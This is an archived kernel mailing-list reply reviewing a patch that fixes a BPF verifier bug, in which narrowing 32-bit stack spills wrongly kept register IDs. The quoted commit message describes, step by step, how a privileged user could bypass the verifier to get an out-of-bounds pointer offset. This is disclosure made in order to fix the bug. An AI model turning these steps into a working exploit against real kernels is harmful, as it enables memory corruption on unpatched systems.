lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 6 Jun 2023 18:32:37 -0700
From: Yonghong Song <yhs@...a.com>
To: Maxim Mikityanskiy <maxtram95@...il.com>, bpf@...r.kernel.org
Cc: netdev@...r.kernel.org, linux-kselftest@...r.kernel.org,
        Daniel Borkmann <daniel@...earbox.net>,
        John Fastabend <john.fastabend@...il.com>,
        Alexei Starovoitov <ast@...nel.org>,
        Andrii Nakryiko <andrii@...nel.org>,
        Martin KaFai Lau <martin.lau@...ux.dev>,
        Eduard Zingerman
 <eddyz87@...il.com>,
        Maxim Mikityanskiy <maxim@...valent.com>, Song Liu <song@...nel.org>,
        Yonghong Song <yhs@...com>, KP Singh <kpsingh@...nel.org>,
        Stanislav Fomichev <sdf@...gle.com>, Hao Luo <haoluo@...gle.com>,
        Jiri Olsa <jolsa@...nel.org>, Mykola Lysenko <mykolal@...com>,
        Shuah Khan <shuah@...nel.org>, "David S. Miller" <davem@...emloft.net>,
        Jakub Kicinski <kuba@...nel.org>,
        Jesper Dangaard Brouer <hawk@...nel.org>
Subject: Re: [PATCH bpf v3 1/2] bpf: Fix verifier tracking scalars on spill



On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote:
> From: Maxim Mikityanskiy <maxim@...valent.com>
> 
> The following scenario describes a verifier bypass in privileged mode
> (CAP_BPF or CAP_SYS_ADMIN):
> 
> 1. Prepare a 32-bit rogue number.
> 2. Put the rogue number into the upper half of a 64-bit register, and
>     roll a random (unknown to the verifier) bit in the lower half. The
>     rest of the bits should be zero (although variations are possible).
> 3. Assign an ID to the register by MOVing it to another arbitrary
>     register.
> 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
>     another register. Due to a bug in the verifier, the ID will be
>     preserved, although the new register will contain only the lower 32
>     bits, i.e. all zeros except one random bit.
> 
> At this point there are two registers with different values but the same
> ID, which means the integrity of the verifier state has been corrupted.
> Next steps show the actual bypass:
> 
> 5. Compare the new 32-bit register with 0. In the branch where it's
>     equal to 0, the verifier will believe that the original 64-bit
>     register is also 0, because it has the same ID, but its actual value
>     still contains the rogue number in the upper half.
>     Some optimizations of the verifier prevent the actual bypass, so
>     extra care is needed: the comparison must be between two registers,
>     and both branches must be reachable (this is why one random bit is
>     needed). Both branches are still suitable for the bypass.
> 6. Right shift the original register by 32 bits to pop the rogue number.
> 7. Use the rogue number as an offset with any pointer. The verifier will
>     believe that the offset is 0, while in reality it's the given number.
> 
> The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
> SCALAR_VALUE. If the spill is narrowing the actual register value, don't
> keep the ID, make sure it's reset to 0.
> 
> Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
> Signed-off-by: Maxim Mikityanskiy <maxim@...valent.com>

LGTM with a small nit below.

Acked-by: Yonghong Song <yhs@...com>

> ---
>   kernel/bpf/verifier.c | 7 +++++++
>   1 file changed, 7 insertions(+)
> 
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 5871aa78d01a..7be23eced561 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   	mark_stack_slot_scratched(env, spi);
>   	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
>   	    !register_is_null(reg) && env->bpf_capable) {
> +		bool reg_value_fits;
> +
>   		if (dst_reg != BPF_REG_FP) {
>   			/* The backtracking logic can only recognize explicit
>   			 * stack slot address like [fp - 8]. Other spill of
> @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   			if (err)
>   				return err;
>   		}
> +
> +		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
>   		save_register_state(state, spi, reg, size);
> +		/* Break the relation on a narrowing spill. */
> +		if (!reg_value_fits)
> +			state->stack[spi].spilled_ptr.id = 0;

I think the code can be simplied like below:

--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct 
bpf_verifier_env *env,
                                 return err;
                 }
                 save_register_state(state, spi, reg, size);
+               if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
+                       state->stack[spi].spilled_ptr.id = 0;
         } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
                    insn->imm != 0 && env->bpf_capable) {
                 struct bpf_reg_state fake_reg = {};

>   	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
>   		   insn->imm != 0 && env->bpf_capable) {
>   		struct bpf_reg_state fake_reg = {};

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ